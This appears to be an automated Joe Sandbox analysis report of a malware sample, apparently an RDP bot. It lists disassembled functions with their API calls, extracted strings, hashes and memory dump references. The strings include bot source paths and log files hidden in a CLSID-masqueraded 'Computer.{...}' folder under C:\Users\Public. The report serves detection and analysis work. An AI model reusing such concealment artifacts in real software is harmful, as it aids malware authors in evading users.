String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-2568489879
Opcode ID: 3efd7ce7fdcbaaf3a8623d6d446461746211eb524509febaaa438a555a75a2e6
Instruction ID: 86ed2bcfc96ae1c88862fbdb33b44b2de2b917c2bd9018ce23de97590aadee99
Opcode Fuzzy Hash: 3efd7ce7fdcbaaf3a8623d6d446461746211eb524509febaaa438a555a75a2e6
Instruction Fuzzy Hash: E9414F61A08E4791FB119B97ED403F83369BF04368F8445BAD98E061B5EF7CEA49C310

Function 00007FFE11507409 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE115074FD

Strings

(name != NULL), xrefs: 00007FFE1150747E
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE1150755B
[D] (%s) -> Done(name=%s), xrefs: 00007FFE1150751D
(ini != NULL), xrefs: 00007FFE1150744B
NULL, xrefs: 00007FFE11507574
ini_get_sec, xrefs: 00007FFE11507452, 00007FFE11507485, 00007FFE115074B8, 00007FFE11507516, 00007FFE11507554
(sec != NULL), xrefs: 00007FFE115074B1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11507459, 00007FFE1150748C, 00007FFE115074BF
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11507444, 00007FFE11507477, 00007FFE115074AA

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-3977765790
Opcode ID: b905e67c97e000c7d0be37e2307b797af4b7c8133c469d1a1c9126d58ad036d7
Instruction ID: ec6f79c933c62fd5d640829baf755df0c4634c70fca91de25c289f6ebe04ace2
Opcode Fuzzy Hash: b905e67c97e000c7d0be37e2307b797af4b7c8133c469d1a1c9126d58ad036d7
Instruction Fuzzy Hash: 21417761E08D8795FB118B97E8403F82369BF003A8F4541BADD8D065B5EF7CE649C310

Function 00007FFE0EB48959 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0EB48A4D

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB489A9, 00007FFE0EB489DC, 00007FFE0EB48A0F
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE0EB48AAB
(sec != NULL), xrefs: 00007FFE0EB48A01
[D] (%s) -> Done(name=%s), xrefs: 00007FFE0EB48A6D
NULL, xrefs: 00007FFE0EB48AC4
(ini != NULL), xrefs: 00007FFE0EB4899B
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EB48994, 00007FFE0EB489C7, 00007FFE0EB489FA
(name != NULL), xrefs: 00007FFE0EB489CE
ini_get_sec, xrefs: 00007FFE0EB489A2, 00007FFE0EB489D5, 00007FFE0EB48A08, 00007FFE0EB48A66, 00007FFE0EB48AA4

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-3977765790
Opcode ID: 0e6af5bea9c95bc139b953abb8657158dd052e7887e4ee60860abe997d4d9689
Instruction ID: ab49d71ce59add776440cfaa352fa51808657bed9c795a525127525b74806d73
Opcode Fuzzy Hash: 0e6af5bea9c95bc139b953abb8657158dd052e7887e4ee60860abe997d4d9689
Instruction Fuzzy Hash: 75413AA2A09747D1FA359F54E8403F463A0FF40748F488532EA9D5A5F5EF7CA989CB40

Function 00007FF76A90824D Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 76stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF76A908258
strlen.MSVCRT ref: 00007FF76A908274
strlen.MSVCRT ref: 00007FF76A908280
strlen.MSVCRT ref: 00007FF76A90830A
strlen.MSVCRT ref: 00007FF76A908337

Strings

.applied, xrefs: 00007FF76A908312
pkg, xrefs: 00007FF76A908296
tch.pkg, xrefs: 00007FF76A9082D7
update.p, xrefs: 00007FF76A908289
????-pat, xrefs: 00007FF76A9082CA

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen
String ID: .applied$????-pat$pkg$tch.pkg$update.p
API String ID: 39653677-1686225151
Opcode ID: 1bacbc015b66ee95983f845907e4a34e664ad53536c5297d35e9b82757521785
Instruction ID: 792e64ed8c8f6e79ea851aa484168d8aac2e5266af4fab5932e267b8674475c7
Opcode Fuzzy Hash: 1bacbc015b66ee95983f845907e4a34e664ad53536c5297d35e9b82757521785
Instruction Fuzzy Hash: 93210B12A0CF43C9FB297B19591437DB5554F657C8FA480B8DE0EDB792DD2CE8508360

Function 00007FFE11501292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE1150133E
fflush.MSVCRT ref: 00007FFE1150134A
EnterCriticalSection.KERNEL32 ref: 00007FFE11501363
LeaveCriticalSection.KERNEL32 ref: 00007FFE1150138B
CopyFileA.KERNEL32 ref: 00007FFE115013E8

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log, xrefs: 00007FFE115013AB
1, xrefs: 00007FFE115013D2
., xrefs: 00007FFE115013CD

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
API String ID: 513531256-2601447032
Opcode ID: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
Instruction ID: bc033abf4b490792397e9d5b6da16b634b20aac5a3859fb5f296f7d2c7242c86
Opcode Fuzzy Hash: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
Instruction Fuzzy Hash: 27417F71A4CA8186F322DB66E8943FD336ABB897A4F4400B5DA0D877B5CF2DE5858701

Function 00007FFE0EB41292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE0EB4133E
fflush.MSVCRT ref: 00007FFE0EB4134A
EnterCriticalSection.KERNEL32 ref: 00007FFE0EB41363
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EB4138B
CopyFileA.KERNEL32 ref: 00007FFE0EB413E8

Strings

1, xrefs: 00007FFE0EB413D2
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log, xrefs: 00007FFE0EB413AB
., xrefs: 00007FFE0EB413CD

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log
API String ID: 513531256-1022500615
Opcode ID: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
Instruction ID: f3c1ae03af07e628172fc752b1c7a554f0c613b1a057ac218881e9cab8e22ad9
Opcode Fuzzy Hash: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
Instruction Fuzzy Hash: 2C416E72A0CA8686F731AF55E8543B933A1FB88780F440131DA8D477B6CF6CE5858F40

Function 00007FFE0E161292 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE0E16133E
fflush.MSVCRT ref: 00007FFE0E16134A
EnterCriticalSection.KERNEL32 ref: 00007FFE0E161363
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E16138B
CopyFileA.KERNEL32 ref: 00007FFE0E1613E8

Strings

1, xrefs: 00007FFE0E1613D2
., xrefs: 00007FFE0E1613CD
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log, xrefs: 00007FFE0E1613AB

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
API String ID: 513531256-2115573132
Opcode ID: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
Instruction ID: 51df0ccf804abd66d1a12af380f48a0e065f8e79715e52f53c7d2a931c677085
Opcode Fuzzy Hash: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
Instruction Fuzzy Hash: 7D412A61A0D68686F220AB11F8543B97361BF89B80F540036DACE97BB6CF3DE586C740

Function 00007FFE11EC2FD2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE11EC307E
fflush.MSVCRT ref: 00007FFE11EC308A
EnterCriticalSection.KERNEL32 ref: 00007FFE11EC30A3
LeaveCriticalSection.KERNEL32 ref: 00007FFE11EC30CB
CopyFileA.KERNEL32 ref: 00007FFE11EC3128

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log, xrefs: 00007FFE11EC30EB
., xrefs: 00007FFE11EC310D
1, xrefs: 00007FFE11EC3112

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
API String ID: 513531256-2729875187
Opcode ID: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
Instruction ID: 13eb223085053165ca3a206ab039972062cbdee92dfdad934736c358a8e31dcf
Opcode Fuzzy Hash: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
Instruction Fuzzy Hash: F441D331A0CE4186FB209BA2EC543BB27A8FB857A0F8450B4DA4D477B1EF3DE5858700

Function 00007FF76A9030B1 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FF76A90314F
GetLastError.KERNEL32 ref: 00007FF76A90316A

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FF76A903188
NULL, xrefs: 00007FF76A9032AD, 00007FF76A9032B9
[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FF76A9032D6
fs_file_copy, xrefs: 00007FF76A90311E, 00007FF76A903181, 00007FF76A9032CF
[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FF76A903125

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: 8a22f5f2bbeffa37bbdc8c419366c9977bd980236b5d373f88f1ed3121c0c59f
Instruction ID: 8d3217b531609092cf25d0daa683c832bf3f33dec608fc35bd84b9a2443937b3
Opcode Fuzzy Hash: 8a22f5f2bbeffa37bbdc8c419366c9977bd980236b5d373f88f1ed3121c0c59f
Instruction Fuzzy Hash: E241D350A0D706D9F6216A299800B77D5207F15BCCFF444BAC91FC6684EE6DEA81C321

Function 00007FF76A902AE5 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,?,?,00007FF76A903833), ref: 00007FF76A902AFC
GetLastError.KERNEL32 ref: 00007FF76A902B53

Strings

NULL, xrefs: 00007FF76A902C82
[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FF76A902B68
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A902B3C
fs_file_delete, xrefs: 00007FF76A902B35, 00007FF76A902B61, 00007FF76A902C91
[I] (%s) -> Done(path=%s), xrefs: 00007FF76A902C98

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 64322ccbdffc7235eab1e505e611ff72ea0675a963048a7793fc422fa198358f
Instruction ID: 93a273e13990eb3e8a6a18b1abab2c7aaf87de4bc649f9e58093991b29e3e793
Opcode Fuzzy Hash: 64322ccbdffc7235eab1e505e611ff72ea0675a963048a7793fc422fa198358f
Instruction Fuzzy Hash: 4A311751F0C306C6FA617A08A4903B9E1445F567D4FF548FACE9ECB291AD3CACC59232

Function 00007FFE11502154 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1150217C
setsockopt.WS2_32 ref: 00007FFE115021A8
WSAGetLastError.WS2_32 ref: 00007FFE115021BF
WSAGetLastError.WS2_32 ref: 00007FFE115021E4

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE115021FB
tcp_set_timeo, xrefs: 00007FFE115021CF, 00007FFE115021F4
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE115021D6

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 13556a42b43b950ca5e744f25c65d511f35711efade1e49ae77115d13bd45b62
Instruction ID: bc795a243c42a86c6a4479ad46f8c9c246e2d2242461297187f3a7ae70f82b66
Opcode Fuzzy Hash: 13556a42b43b950ca5e744f25c65d511f35711efade1e49ae77115d13bd45b62
Instruction Fuzzy Hash: E411E671A0C94296E311AB67E840079666AFF887B4F104276EA6D837B4DF7CD50ACB01

Function 00007FFE0EB44CD4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0EB44CFC
setsockopt.WS2_32 ref: 00007FFE0EB44D28
WSAGetLastError.WS2_32 ref: 00007FFE0EB44D3F
WSAGetLastError.WS2_32 ref: 00007FFE0EB44D64

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB44D7B
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB44D56
tcp_set_timeo, xrefs: 00007FFE0EB44D4F, 00007FFE0EB44D74

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 5b33547d2e8b2079c483bff5ae4c0ca30c3b29f38f34b3308c77c28b13d9fdbb
Instruction ID: 50d617040d8d4fb8e9c0884c514436c2805cb0120ae249172947cb8794f4c380
Opcode Fuzzy Hash: 5b33547d2e8b2079c483bff5ae4c0ca30c3b29f38f34b3308c77c28b13d9fdbb
Instruction Fuzzy Hash: 8D1142B2A1864796E334AF19E80067A77A0EF88754F504235E9AE83BB4DF7CD549CF00

Function 00007FFE0E162154 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0E16217C
setsockopt.WS2_32 ref: 00007FFE0E1621A8
WSAGetLastError.WS2_32 ref: 00007FFE0E1621BF
WSAGetLastError.WS2_32 ref: 00007FFE0E1621E4

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E1621FB
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E1621D6
tcp_set_timeo, xrefs: 00007FFE0E1621CF, 00007FFE0E1621F4

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 3bfaa4a80639916eba1a0dc93ee1bfbb9301a9e214be40c6f5af664c170a041f
Instruction ID: 96392233d462ee23b98f42f5f5bdf917eb723852cf4880b8a591e347f2f528ca
Opcode Fuzzy Hash: 3bfaa4a80639916eba1a0dc93ee1bfbb9301a9e214be40c6f5af664c170a041f
Instruction Fuzzy Hash: 9D112E71A0C55696F360AB26E8004666671AF88754F104237EAEE836B5DF7CD549CB00

Function 00007FFE11EC2294 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE11EC22BC
setsockopt.WS2_32 ref: 00007FFE11EC22E8
WSAGetLastError.WS2_32 ref: 00007FFE11EC22FF
WSAGetLastError.WS2_32 ref: 00007FFE11EC2324

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC233B
tcp_set_timeo, xrefs: 00007FFE11EC230F, 00007FFE11EC2334
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC2316

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: cb40287893e08d24f375e63105966694ca813ec55b6096321e8db1e943bfa61b
Instruction ID: 427271bd437a37ae01a6be7a4b1c9630556688cd4d796d9411bbec9c3667994f
Opcode Fuzzy Hash: cb40287893e08d24f375e63105966694ca813ec55b6096321e8db1e943bfa61b
Instruction Fuzzy Hash: 2811E270A0899386E7209F9BEC0416BA668FF88774F505271E96D83BF4DF7CE5498B00

